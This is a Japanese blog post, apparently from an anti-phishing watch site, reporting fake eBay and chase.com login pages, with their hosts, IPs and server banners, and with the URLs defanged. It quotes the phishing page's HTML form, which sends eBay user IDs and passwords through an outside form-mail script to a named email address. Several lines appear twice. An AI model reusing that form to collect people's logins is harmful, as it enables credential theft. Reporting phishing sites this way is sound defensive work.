フィッシング詐欺サイト情報
Yesterday: 
ClamAVでHTML.Phishing.Auction-105と検知されています。
mujweb.cz自体は無料のサービスのようですが過去に何回かフィッシングのページがつくられています。
アドレスは212.47.13.223でチェコ、逆引きはatlas223.a2.atlas.czです。
wwwサーバーの応答はBad Requestとなります。
<FORM NAME="ContactForm" ACTION="http://webtools.infi.net/cgi-bin/webforms.pl" METHOD="POST">
<INPUT TYPE=hidden NAME=mailto VALUE="dany_seff@yahoo.com">
<INPUT TYPE=hidden NAME=mailsubject VALUE="USERE - eBay userid and pass">
mujweb.cz自体は無料のサービスのようですが過去に何回かフィッシングのページがつくられています。
アドレスは212.47.13.223でチェコ、逆引きはatlas223.a2.atlas.czです。
wwwサーバーの応答はBad Requestとなります。
<FORM NAME="ContactForm" ACTION="http://webtools.infi.net/cgi-bin/webforms.pl" METHOD="POST">
<INPUT TYPE=hidden NAME=mailto VALUE="dany_seff@yahoo.com">
<INPUT TYPE=hidden NAME=mailsubject VALUE="USERE - eBay userid and pass">
● chase.comの偽サイト ttp://mail.travla.com/.chase.com/index.php?prospect_nfpb=trueportlet_change_1_actionOverrideFchaseonlineFchangeFverifyDetails_windowLabel_portlet_change_pageLabel_page_change
mail.travla.comのアドレスは206.14.132.102でアメリカ、逆引きは同じmail.travla.comです。
トップページはWebmail画面なのでクラックされて開設されたものと判断できます。
サーバーの応答はApache/2.0.40 (Red Hat Linux)です。
トップページはWebmail画面なのでクラックされて開設されたものと判断できます。
サーバーの応答はApache/2.0.40 (Red Hat Linux)です。
● chase.comの偽サイト ttp://0x3a6613aa/panachart/shots/%20/.cgi/www.chaseonline.chase.com/Security-Accounts/login-run/UsingSsl/prdata/userprofile/custserv/chase/WebTeller/orteisapi.dll/BankTag/security/information/user-data-profile/Chase-Manhattan.us/
コンテンツはすでに消されています。
0x3a6613aaのアドレスは58.102.19.170で韓国、逆引きはありません。
現在のサーバーの応答は Apache/2.0.55 (Unix) PHP/5.1.1 と返ります。
0x3a6613aaのアドレスは58.102.19.170で韓国、逆引きはありません。
現在のサーバーの応答は Apache/2.0.55 (Unix) PHP/5.1.1 と返ります。
— posted by staff @ 08:10AM
| TrackBack(0)
